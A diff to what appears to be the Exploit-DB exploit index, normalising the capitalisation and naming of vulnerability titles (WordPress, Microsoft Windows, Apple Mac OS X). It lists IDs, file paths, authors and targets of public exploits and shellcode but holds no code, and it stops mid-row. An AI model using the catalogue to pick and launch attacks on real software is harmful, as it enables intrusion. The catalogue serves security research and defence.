37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G 3.0.1.4912 - Persistent Cross-Site Scripting / Information Leakage",2015-07-27,hyp3rlinx,multiple,webapps,0 37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0 -37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III - .h3m Map file Buffer Overflow",2015-08-07,Metasploit,windows,local,0 -37825,platforms/osx/local/37825.txt,"OS X 10.10.5 - XNU Privilege Escalation",2015-08-18,kpwn,osx,local,0 -37826,platforms/php/webapps/37826.txt,"Wordpress 3.4.2 - Multiple Path Dislosure Vulnerabilities",2012-09-18,AkaStep,php,webapps,0 -37751,platforms/php/webapps/37751.txt,"Wordpress WPTF Image Gallery 1.03 Plugin - Aribtrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 -37752,platforms/php/webapps/37752.txt,"Wordpress Recent Backups Plugin 0.7 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 -37705,platforms/php/webapps/37705.txt,"Wordpress Unite Gallery Lite Plugin 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80 -37707,platforms/php/webapps/37707.txt,"Wordpress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80 +37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III - '.h3m' Map file Buffer Overflow",2015-08-07,Metasploit,windows,local,0 +37825,platforms/osx/local/37825.txt,"Apple Mac OS X 10.10.5 - XNU Privilege Escalation",2015-08-18,kpwn,osx,local,0 +37826,platforms/php/webapps/37826.txt,"WordPress 3.4.2 - Multiple Path Disclosure Vulnerabilities",2012-09-18,AkaStep,php,webapps,0 +37751,platforms/php/webapps/37751.txt,"WordPress WPTF Image Gallery 1.03 Plugin - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 +37752,platforms/php/webapps/37752.txt,"WordPress Recent Backups Plugin 0.7 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 +37705,platforms/php/webapps/37705.txt,"WordPress Unite Gallery Lite Plugin 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80 +37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80 37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0 37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution",2015-07-28,hyp3rlinx,php,webapps,0 37710,platforms/linux/local/37710.txt,"Sudo 1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0 @@ -34048,41 +34051,41 @@ id,file,description,date,author,platform,type,port 37714,platforms/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,php,webapps,80 37715,platforms/php/webapps/37715.txt,"Tendoo CMS 1.3 - Cross-Site Scripting",2015-07-29,"Arash Khazaei",php,webapps,80 37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0 -37717,platforms/windows/dos/37717.pl,"KMPlayer 3.9.x - .srt Crash (PoC)",2015-07-31,"Peyman Motevalli Manesh",windows,dos,0 +37717,platforms/windows/dos/37717.pl,"KMPlayer 3.9.x - '.srt' Crash (PoC)",2015-07-31,"Peyman Motevalli Manesh",windows,dos,0 37718,platforms/windows/dos/37718.py,"T-Mobile Internet Manager - Contact Name Crash (PoC)",2015-07-31,"SATHISH ARTHAR",windows,dos,0 37719,platforms/windows/dos/37719.py,"Acunetix Web Vulnerability Scanner 9.5 - Crash (PoC)",2015-07-31,"Hadi Zomorodi Monavar",windows,dos,0 37720,platforms/hardware/webapps/37720.py,"NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,hardware,webapps,0 37721,platforms/multiple/dos/37721.c,"BIND9 - TKEY (PoC)",2015-08-01,"Errata Security",multiple,dos,0 37722,platforms/linux/local/37722.c,"Linux espfix64 - Privilege Escalation (Nested NMIs Interrupting)",2015-08-05,"Andrew Lutomirski",linux,local,0 37723,platforms/multiple/dos/37723.py,"ISC BIND9 - TKEY Remote Denial of Service (PoC)",2015-08-05,elceef,multiple,dos,0 -37724,platforms/linux/local/37724.asm,"Linux x86 - Memory Sinkhole Privilege Escalation (PoC)",2015-08-07,"Christopher Domas",linux,local,0 +37724,platforms/linux/local/37724.asm,"Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)",2015-08-07,"Christopher Domas",linux,local,0 37725,platforms/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",php,webapps,0 37726,platforms/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",php,webapps,80 37727,platforms/windows/dos/37727.py,"Python IDLE 2.7.8 - Crash (PoC)",2015-08-07,"Hadi Zomorodi Monavar",windows,dos,0 37728,platforms/php/dos/37728.py,"OSSEC WUI 0.8 - Denial of Service",2015-08-07,"Milad Saber",php,dos,0 -37729,platforms/windows/remote/37729.py,"Filezilla Client 2.2.X - SEH Buffer Overflow",2015-08-07,ly0n,windows,remote,0 +37729,platforms/windows/remote/37729.py,"FileZilla Client 2.2.x - SEH Buffer Overflow",2015-08-07,ly0n,windows,remote,0 37730,platforms/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - '.m3u' SEH Buffer Overflow",2015-08-07,"Saeid Atabaki",windows,local,0 37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - PUT Command Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21 -37732,platforms/win_x86/local/37732.c,"Windows XP SP3 x86 / 2003 SP2 x86 - 'NDProxy' Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",win_x86,local,0 +37732,platforms/win_x86/local/37732.c,"Microsoft Windows XP SP3 x86 / 2003 SP2 (x86) - 'NDProxy' Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",win_x86,local,0 37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,php,webapps,80 37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 - File Upload Filter Bypass Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80 37747,platforms/windows/dos/37747.py,"Havij Pro - Crash (PoC)",2015-08-10,i_7e1,windows,dos,0 -37753,platforms/php/webapps/37753.txt,"Wordpress Simple Image Manipulator Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 -37738,platforms/php/webapps/37738.txt,"Wordpress Job Manager Plugin 0.7.22 - Persistent Cross-Site Scripting",2015-08-07,"Owais Mehtab",php,webapps,80 +37753,platforms/php/webapps/37753.txt,"WordPress Simple Image Manipulator Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 +37738,platforms/php/webapps/37738.txt,"WordPress Job Manager Plugin 0.7.22 - Persistent Cross-Site Scripting",2015-08-07,"Owais Mehtab",php,webapps,80 37739,platforms/windows/dos/37739.py,"Dell Netvault Backup 10.0.1.24 - Denial of Service",2015-08-07,"Josep Pi Rodriguez",windows,dos,20031 38106,platforms/aix/local/38106.txt,"IBM AIX High Availability Cluster Multiprocessing (HACMP) - Privilege Escalation",2015-09-08,"Kristian Erik Hermansen",aix,local,0 38107,platforms/windows/local/38107.c,"Cisco Sourcefire User Agent 2.2 - Insecure File Permissions",2015-09-08,"Glafkos Charalambous ",windows,local,0 -37741,platforms/osx/dos/37741.txt,"OSX Keychain - EXC_BAD_ACCESS Denial of Service",2015-08-08,"Juan Sacco",osx,dos,0 -37824,platforms/php/webapps/37824.txt,"Wordpress WP Symposium Plugin 15.1 - 'get_album_item.php' SQL Injection",2015-08-18,PizzaHatHacker,php,webapps,80 +37741,platforms/osx/dos/37741.txt,"Apple Mac OS X Keychain - EXC_BAD_ACCESS Denial of Service",2015-08-08,"Juan Sacco",osx,dos,0 +37824,platforms/php/webapps/37824.txt,"WordPress WP Symposium Plugin 15.1 - 'get_album_item.php' SQL Injection",2015-08-18,PizzaHatHacker,php,webapps,80 37743,platforms/linux/dos/37743.pl,"Brasero - Crash (PoC)",2015-08-08,"Mohammad Reza Espargham",linux,dos,0 -37744,platforms/php/webapps/37744.txt,"Wordpress Video Gallery 2.7 Plugin - SQL Injection",2015-08-09,"Kacper Szurek",php,webapps,0 +37744,platforms/php/webapps/37744.txt,"WordPress Video Gallery 2.7 Plugin - SQL Injection",2015-08-09,"Kacper Szurek",php,webapps,0 37749,platforms/lin_x86/shellcode/37749.c,"Linux/x86 - Egg Hunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode,0 37750,platforms/php/webapps/37750.txt,"WDS CMS - SQL Injection",2015-08-10,"Ismail Marzouk",php,webapps,80 37746,platforms/windows/remote/37746.py,"Netsparker 2.3.x - Remote Code Execution",2015-08-09,"Hesam Bazvand",windows,remote,0 -37754,platforms/php/webapps/37754.txt,"Wordpress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 -37755,platforms/windows/local/37755.c,"Windows 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0 -37947,platforms/multiple/remote/37947.txt,"LiteSpeed Web Server - 'gtitle' parameter Cross-Site Scripting",2012-03-12,K1P0D,multiple,remote,0 -37948,platforms/php/webapps/37948.txt,"Wordpress Slideshow Plugin - Multiple Cross-Site Scripting Vulnerabilities",2012-10-17,waraxe,php,webapps,0 +37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 +37755,platforms/windows/local/37755.c,"Microsoft Windows 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0 +37947,platforms/multiple/remote/37947.txt,"Litespeed Web Server - 'gtitle' Parameter Cross-Site Scripting",2012-03-12,K1P0D,multiple,remote,0 +37948,platforms/php/webapps/37948.txt,"WordPress Slideshow Plugin - Multiple Cross-Site Scripting Vulnerabilities",2012-10-17,waraxe,php,webapps,0 37949,platforms/linux/remote/37949.txt,"ModSecurity - POST Parameters Security Bypass",2012-10-17,"Bernhard Mueller",linux,remote,0 37950,platforms/php/webapps/37950.txt,"jCore - /admin/index.php path Parameter Cross-Site Scripting",2012-10-17,"High-Tech Bridge",php,webapps,0 37951,platforms/windows/remote/37951.py,"Easy File Sharing Web Server 6.9 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0 @@ -34097,28 +34100,28 @@ id,file,description,date,author,platform,type,port 37765,platforms/multiple/webapps/37765.txt,"Zend Framework 2.4.2 - XML eXternal Entity Injection (XXE) on PHP FPM",2015-08-13,"Dawid Golunski",multiple,webapps,0 37766,platforms/multiple/dos/37766.py,"Google Chrome 43.0 - Certificate MIME Handling Integer Overflow",2015-08-13,"Paulos Yibelo",multiple,dos,0 37767,platforms/multiple/webapps/37767.txt,"Joomla Event Manager 2.1.4 - Multiple Vulnerabilities",2015-08-13,"Martino Sani",multiple,webapps,0 -37768,platforms/windows/local/37768.txt,"Windows 8.1 - DCOM DCE/RPC Local NTLM Reflection Privilege Escalation (MS15-076)",2015-08-13,monoxgas,windows,local,0 +37768,platforms/windows/local/37768.txt,"Microsoft Windows 8.1 - DCOM DCE/RPC Local NTLM Reflection Privilege Escalation (MS15-076)",2015-08-13,monoxgas,windows,local,0 37769,platforms/php/webapps/37769.txt,"Gkplugins Picasaweb - Download File",2015-08-15,"TMT zno",php,webapps,0 37770,platforms/hardware/webapps/37770.txt,"TOTOLINK Routers - Backdoor and Remote Code Execution (PoC)",2015-08-15,MadMouse,hardware,webapps,0 37771,platforms/windows/local/37771.py,"Microsoft HTML Help Compiler 4.74.8702.0 - SEH Based Overflow",2015-08-15,St0rn,windows,local,0 37772,platforms/multiple/local/37772.js,"Firefox < 39.03 - pdf.js Same Origin Policy Exploit",2015-08-15,"Tantaryu MING",multiple,local,0 -37773,platforms/php/webapps/37773.txt,"Joomla com_memorix component - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0 -37774,platforms/php/webapps/37774.txt,"Joomla com_informations component - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0 +37773,platforms/php/webapps/37773.txt,"Joomla com_memorix Component - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0 +37774,platforms/php/webapps/37774.txt,"Joomla com_informations Component - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0 37775,platforms/windows/dos/37775.py,"Ability FTP Server 2.1.4 - afsmain.exe USER Command Remote Denial of Service",2015-08-15,St0rn,windows,dos,0 37776,platforms/windows/dos/37776.py,"Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote Denial of Service",2015-08-15,St0rn,windows,dos,0 37777,platforms/linux/dos/37777.txt,"NetKit FTP Client (Ubuntu 14.04) - Crash/Denial of Service (PoC)",2015-08-15,"TUNISIAN CYBER",linux,dos,0 37778,platforms/hardware/webapps/37778.txt,"Security IP Camera Star Vision DVR - Authentication Bypass",2015-08-15,"Meisam Monsef",hardware,webapps,0 37779,platforms/php/webapps/37779.txt,"Flogr - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-09-05,"High-Tech Bridge",php,webapps,0 37780,platforms/windows/local/37780.c,"ThinPrint - 'tpfc.dll' Insecure Library Loading Arbitrary Code Execution",2012-09-04,"Moshe Zioni",windows,local,0 -37781,platforms/php/webapps/37781.txt,"ExtCalendar 2.0 - Multiple SQL Injections / HTML Injection Vulnerabilities",2012-09-05,"Ashiyane Digital Security Team",php,webapps,0 +37781,platforms/php/webapps/37781.txt,"Extcalendar 2.0 - Multiple SQL Injections / HTML Injection Vulnerabilities",2012-09-05,"Ashiyane Digital Security Team",php,webapps,0 37782,platforms/php/webapps/37782.txt,"web@all - Local File Inclusion / Multiple Arbitrary File Upload Vulnerabilities",2012-09-06,KedAns-Dz,php,webapps,0 37783,platforms/linux/dos/37783.c,"GNU glibc - 'strcoll()' Routine Integer Overflow",2012-09-07,"Jan iankko Lieskovsky",linux,dos,0 37784,platforms/php/webapps/37784.txt,"Pinterestclones - Security Bypass / HTML Injection Vulnerabilities",2012-09-08,DaOne,php,webapps,0 37785,platforms/php/webapps/37785.txt,"VICIDIAL Call Center Suite - Multiple SQL Injections",2012-09-10,"Sepahan TelCom IT Group",php,webapps,0 -37786,platforms/php/webapps/37786.txt,"DeltaScripts PHP Links - Multiple SQL Injections",2012-09-10,L0n3ly-H34rT,php,webapps,0 -37787,platforms/php/webapps/37787.txt,"Wordpress Download Monitor Plugin - 'dlsearch' Parameter Cross-Site Scripting",2012-08-30,"Chris Cooper",php,webapps,0 +37786,platforms/php/webapps/37786.txt,"DELTAScripts PHP Links - Multiple SQL Injections",2012-09-10,L0n3ly-H34rT,php,webapps,0 +37787,platforms/php/webapps/37787.txt,"WordPress Download Monitor Plugin - 'dlsearch' Parameter Cross-Site Scripting",2012-08-30,"Chris Cooper",php,webapps,0 37788,platforms/linux/remote/37788.py,"libguac - Remote Buffer Overflow",2012-09-11,"Michael Jumper",linux,remote,0 -37789,platforms/php/webapps/37789.txt,"Openfiler 2.3 - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2012-09-06,"Brendan Coles",php,webapps,0 +37789,platforms/php/webapps/37789.txt,"OpenFiler 2.3 - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2012-09-06,"Brendan Coles",php,webapps,0 37790,platforms/php/webapps/37790.txt,"FBDj - 'id' Parameter SQL Injection",2012-09-11,"TUNISIAN CYBER",php,webapps,0 37791,platforms/multiple/webapps/37791.txt,"Atlassian Confluence 3.4.x - Error Page Cross-Site Scripting",2012-09-12,"D. Niedermaier",multiple,webapps,0 37792,platforms/android/remote/37792.txt,"Google Chrome for Android - com.android.browser.application_id Intent Extra Data Cross-Site Scripting",2012-09-12,"Artem Chaykin",android,remote,0 @@ -34129,11 +34132,11 @@ id,file,description,date,author,platform,type,port 37941,platforms/php/webapps/37941.txt,"SenseSites CommonSense CMS - special.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 37942,platforms/php/webapps/37942.txt,"SenseSites CommonSense CMS - article.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 37943,platforms/php/webapps/37943.txt,"WebTitan - 'logs-x.php' Directory Traversal",2012-10-20,"Richard Conner",php,webapps,0 -37944,platforms/php/webapps/37944.txt,"vBSEO - 'u' parameter Cross-Site Scripting",2012-06-16,MegaMan,php,webapps,0 -37945,platforms/php/webapps/37945.txt,"SilverStripe 2.4.x - 'BackURL' Parameter URI Redirection",2012-10-15,"Aung Khant",php,webapps,0 -37946,platforms/php/webapps/37946.txt,"Wordpress Crayon Syntax Highlighter Plugin - 'wp_load' Parameter Remote File Inclusion",2012-10-15,"Charlie Eriksen",php,webapps,0 +37944,platforms/php/webapps/37944.txt,"vBSEO - 'u' Parameter Cross-Site Scripting",2012-06-16,MegaMan,php,webapps,0 +37945,platforms/php/webapps/37945.txt,"Silverstripe 2.4.x - 'BackURL' Parameter URI redirection",2012-10-15,"Aung Khant",php,webapps,0 +37946,platforms/php/webapps/37946.txt,"WordPress Crayon Syntax Highlighter Plugin - 'wp_load' Parameter Remote File Inclusion",2012-10-15,"Charlie Eriksen",php,webapps,0 38001,platforms/windows/dos/38001.py,"freeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,windows,dos,22 -37798,platforms/windows/dos/37798.py,"XMPlay 3.8.1.12 - .pls Local Crash (PoC)",2015-08-17,St0rn,windows,dos,0 +37798,platforms/windows/dos/37798.py,"XMPlay 3.8.1.12 - '.pls' Local Crash (PoC)",2015-08-17,St0rn,windows,dos,0 37799,platforms/windows/local/37799.py,"MASM321 11 Quick Editor - (.qeditor) 4.0g- .qse SEH Based Buffer Overflow (ASLR & SAFESEH Bypass)",2015-08-17,St0rn,windows,local,0 37800,platforms/windows/remote/37800.php,"Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064)",2015-08-17,"Mohammad Reza Espargham",windows,remote,0 37801,platforms/hardware/webapps/37801.sh,"Sagemcom F@ST 3864 V2 - Get Admin Password",2015-08-17,"Cade Bull",hardware,webapps,0 @@ -34146,7 +34149,7 @@ id,file,description,date,author,platform,type,port 37808,platforms/windows/remote/37808.py,"Easy File Management Web Server 5.6 - USERID Remote Buffer Overflow",2015-08-18,"Tracy Turben",windows,remote,0 37809,platforms/php/webapps/37809.php,"Nuts CMS - Remote PHP Code Injection / Execution",2015-08-17,"Yakir Wizman",php,webapps,80 37810,platforms/windows/dos/37810.txt,"FTP Commander 8.02 - SEH Overwrite",2015-08-18,Un_N0n,windows,dos,0 -37811,platforms/php/webapps/37811.py,"Magento CE < 1.9.0.1 - Post-Authenticated Remote Code Execution",2015-08-18,Ebrietas0,php,webapps,80 +37811,platforms/php/webapps/37811.py,"Magento CE < 1.9.0.1 - Post-Authentication Remote Code Execution",2015-08-18,Ebrietas0,php,webapps,80 37812,platforms/win_x86/remote/37812.rb,"Symantec Endpoint Protection Manager - Authentication Bypass / Code Execution",2015-08-18,Metasploit,win_x86,remote,8443 37813,platforms/windows/local/37813.rb,"VideoCharge Studio - Buffer Overflow (SEH)",2015-08-18,Metasploit,windows,local,0 37814,platforms/python/remote/37814.rb,"Werkzeug - Debug Shell Command Execution",2015-08-18,Metasploit,python,remote,0 @@ -34155,22 +34158,22 @@ id,file,description,date,author,platform,type,port 37819,platforms/php/webapps/37819.txt,"PHPfileNavigator 2.3.3 - Privilege Escalation",2015-08-18,hyp3rlinx,php,webapps,80 37820,platforms/php/webapps/37820.txt,"CodoForum 3.3.1 - Multiple SQL Injections",2015-08-18,"Curesec Research Team",php,webapps,80 37821,platforms/php/webapps/37821.txt,"BigTree CMS 4.2.3 - Authenticated SQL Injection",2015-08-18,"Curesec Research Team",php,webapps,80 -37822,platforms/php/webapps/37822.txt,"Wordpress WP Symposium Plugin 15.1 - Blind SQL Injection",2015-08-18,dxw,php,webapps,80 -37827,platforms/php/webapps/37827.txt,"Wordpress Purity Theme - Multiple Cross-Site Scripting Vulnerabilities",2012-09-07,"Matan Azugi",php,webapps,0 +37822,platforms/php/webapps/37822.txt,"WordPress WP Symposium Plugin 15.1 - Blind SQL Injection",2015-08-18,dxw,php,webapps,80 +37827,platforms/php/webapps/37827.txt,"WordPress Purity Theme - Multiple Cross-Site Scripting Vulnerabilities",2012-09-07,"Matan Azugi",php,webapps,0 37828,platforms/php/webapps/37828.txt,"Poweradmin - 'index.php' Cross-Site Scripting",2012-09-20,Siavash,php,webapps,0 -37829,platforms/php/webapps/37829.txt,"Wordpress MF Gig Calendar Plugin - Cross-Site Scripting",2012-09-20,"Chris Cooper",php,webapps,0 +37829,platforms/php/webapps/37829.txt,"WordPress MF Gig Calendar Plugin - Cross-Site Scripting",2012-09-20,"Chris Cooper",php,webapps,0 37830,platforms/cgi/webapps/37830.txt,"ZEN Load Balancer - Multiple Security Vulnerabilities",2012-09-24,"Brendan Coles",cgi,webapps,0 37937,platforms/linux/local/37937.c,"Linux Kernel 3.2.x - 'uname()' System Call Local Information Disclosure",2012-10-09,"Brad Spengler",linux,local,0 37938,platforms/php/webapps/37938.txt,"OpenX - /www/admin/plugin-index.php parent Parameter Cross-Site Scripting",2012-10-10,"High-Tech Bridge",php,webapps,0 37939,platforms/php/webapps/37939.txt,"FileContral - Local File Inclusion / Local File Disclosure",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0 -38066,platforms/php/webapps/38066.txt,"Wordpress Video Lead Form Plugin - 'errMsg' Parameter Cross-Site Scripting",2012-11-29,"Aditya Balapure",php,webapps,0 +38066,platforms/php/webapps/38066.txt,"WordPress Video Lead Form Plugin - 'errMsg' Parameter Cross-Site Scripting",2012-11-29,"Aditya Balapure",php,webapps,0 38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,Orwelllabs,hardware,webapps,80 37833,platforms/php/webapps/37833.txt,"YCommerce - Multiple SQL Injections",2012-09-21,"Ricardo Almeida",php,webapps,0 37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 - Unspecified Remote Code Execution",2012-09-24,kb,linux,remote,0 -37835,platforms/php/webapps/37835.html,"Wordpress 3.4.2 - Cross-Site Request Forgery",2012-09-22,AkaStep,php,webapps,0 -37836,platforms/php/webapps/37836.txt,"Wordpress Token Manager Plugin - 'tid' Parameter Cross-Site Scripting",2012-09-25,TheCyberNuxbie,php,webapps,0 -37837,platforms/php/webapps/37837.html,"Wordpress Sexy Add Template Plugin - Cross-Site Request Forgery",2012-09-22,the_cyber_nuxbie,php,webapps,0 -37838,platforms/php/webapps/37838.txt,"Neturf eCommerce Shopping Cart - 'SearchFor' Parameter Cross-Site Scripting",2011-12-30,farbodmahini,php,webapps,0 +37835,platforms/php/webapps/37835.html,"WordPress 3.4.2 - Cross-Site Request Forgery",2012-09-22,AkaStep,php,webapps,0 +37836,platforms/php/webapps/37836.txt,"WordPress Token Manager Plugin - 'tid' Parameter Cross-Site Scripting",2012-09-25,TheCyberNuxbie,php,webapps,0 +37837,platforms/php/webapps/37837.html,"WordPress Sexy Add Template Plugin - Cross-Site Request Forgery",2012-09-22,the_cyber_nuxbie,php,webapps,0 +37838,platforms/php/webapps/37838.txt,"Neturf eCommerce Shopping Cart - 'searchFor' Parameter Cross-Site Scripting",2011-12-30,farbodmahini,php,webapps,0 37839,platforms/linux/dos/37839.txt,"Flash - PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution",2015-08-19,"Google Security Research",linux,dos,0 37840,platforms/windows/remote/37840.txt,"Flash Broker-Based - Sandbox Escape via Forward Slash Instead of Backslash",2015-08-19,KeenTeam,windows,remote,0 37841,platforms/windows/remote/37841.txt,"Flash Broker-Based - Sandbox Escape via Unexpected Directory Lock",2015-08-19,KeenTeam,windows,remote,0 @@ -34179,8 +34182,8 @@ id,file,description,date,author,platform,type,port 37844,platforms/windows/dos/37844.txt,"Adobe Flash - AVSS.setSubscribedTags Use-After-Free Memory Corruption",2015-08-19,"Google Security Research",windows,dos,0 37845,platforms/windows/dos/37845.txt,"Flash - Uninitialized Stack Variable MPD Parsing Memory Corruption",2015-08-19,bilou,windows,dos,0 37846,platforms/windows/dos/37846.txt,"Flash - Issues in DefineBitsLossless and DefineBitsLossless2 Leads to Using Uninitialized Memory",2015-08-19,bilou,windows,dos,0 -37847,platforms/windows/dos/37847.txt,"Adobe Flash AS2 - TextField.filters Use-After-Free (1)",2015-08-19,bilou,windows,dos,0 -37848,platforms/windows/dos/37848.txt,"Adobe Flash AS2 - TextField.filters Use-After-Free (2)",2015-08-19,bilou,windows,dos,0 +37847,platforms/windows/dos/37847.txt,"Adobe Flash AS2 - textfield.filters Use-After-Free (1)",2015-08-19,bilou,windows,dos,0 +37848,platforms/windows/dos/37848.txt,"Adobe Flash AS2 - textfield.filters Use-After-Free (2)",2015-08-19,bilou,windows,dos,0 37849,platforms/windows/dos/37849.txt,"Adobe Flash - Display List Handling Use-After-Free",2015-08-19,KeenTeam,windows,dos,0 37850,platforms/multiple/dos/37850.txt,"Adobe Flash - NetConnection.connect Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 37851,platforms/multiple/remote/37851.txt,"Flash Boundless Tunes - Universal SOP Bypass Through ActionSctipt's Sound Object",2015-08-19,"Google Security Research",multiple,remote,0 @@ -34209,13 +34212,13 @@ id,file,description,date,author,platform,type,port 37874,platforms/multiple/dos/37874.txt,"Adobe Flash - Type Confusion in TextRenderer.setAdvancedAntialiasingTable",2015-08-19,"Google Security Research",multiple,dos,0 37875,platforms/windows/dos/37875.txt,"Adobe Flash - URL Resource Use-After-Free",2015-08-19,"Google Security Research",windows,dos,0 37876,platforms/lin_x86-64/dos/37876.txt,"Adobe Flash - XMLSocket Destructor Not Cleared Before Setting User Data in connect",2015-08-19,"Google Security Research",lin_x86-64,dos,0 -37877,platforms/multiple/dos/37877.txt,"Adobe Flash - TextField.gridFitType Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 +37877,platforms/multiple/dos/37877.txt,"Adobe Flash - textfield.gridFitType Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 37878,platforms/multiple/dos/37878.txt,"Adobe Flash - FileReference Class Type Confusion",2015-08-19,"Google Security Research",multiple,dos,0 37879,platforms/lin_x86-64/dos/37879.txt,"Adobe Flash - Heap Based Buffer Overflow Loading FLV File with Nellymoser Audio Codec",2015-08-19,"Google Security Research",lin_x86-64,dos,0 37880,platforms/lin_x86-64/dos/37880.txt,"Adobe Flash - Heap Based Buffer Overflow Due to Indexing Error When Loading FLV File",2015-08-19,"Google Security Research",lin_x86-64,dos,0 37881,platforms/win_x86/dos/37881.txt,"Adobe Flash - Shared Object Type Confusion",2015-08-19,"Google Security Research",win_x86,dos,0 37882,platforms/multiple/dos/37882.txt,"Adobe Flash - Overflow in ID3 Tag Parsing",2015-08-19,"Google Security Research",multiple,dos,0 -37883,platforms/windows/dos/37883.txt,"Adobe Flash AS2 - TextField.filters Use-After-Free (3)",2015-08-19,bilou,windows,dos,0 +37883,platforms/windows/dos/37883.txt,"Adobe Flash AS2 - textfield.filters Use-After-Free (3)",2015-08-19,bilou,windows,dos,0 37884,platforms/windows/dos/37884.txt,"Adobe Flash - Heap Use-After-Free in SurfaceFilterList::C​reateFromScriptAtom",2015-08-19,bilou,windows,dos,0 37885,platforms/php/webapps/37885.html,"up.time 7.5.0 - Superadmin Privilege Escalation",2015-08-19,LiquidWorm,php,webapps,9999 37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 - Cross-Site Scripting / Cross-Site Request Forgery Add Admin Exploit",2015-08-19,LiquidWorm,php,webapps,9999 @@ -34223,39 +34226,39 @@ id,file,description,date,author,platform,type,port 37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 - Upload And Execute File Exploit",2015-08-19,LiquidWorm,php,webapps,9999 37889,platforms/linux/remote/37889.txt,"YingZhiPython - Directory Traversal / Arbitrary File Upload",2012-09-26,"Larry Cashdollar",linux,remote,0 37890,platforms/windows/local/37890.py,"Multiple ChiefPDF Software 2.0 - Buffer Overflow",2015-08-20,metacom,windows,local,0 -37891,platforms/xml/webapps/37891.txt,"Aruba Mobility Controller 6.4.2.8 - Multiple vulnerabilities",2015-08-20,"Itzik Chen",xml,webapps,4343 +37891,platforms/xml/webapps/37891.txt,"Aruba Mobility Controller 6.4.2.8 - Multiple Vulnerabilities",2015-08-20,"Itzik Chen",xml,webapps,4343 37892,platforms/asp/webapps/37892.txt,"Vifi Radio v1 - Cross-Site Request Forgery",2015-08-20,KnocKout,asp,webapps,80 37893,platforms/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack Based Buffer Overflow",2015-08-20,Un_N0n,windows,dos,21 37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80 37895,platforms/win_x86-64/shellcode/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",win_x86-64,shellcode,0 -37896,platforms/php/webapps/37896.txt,"Wordpress 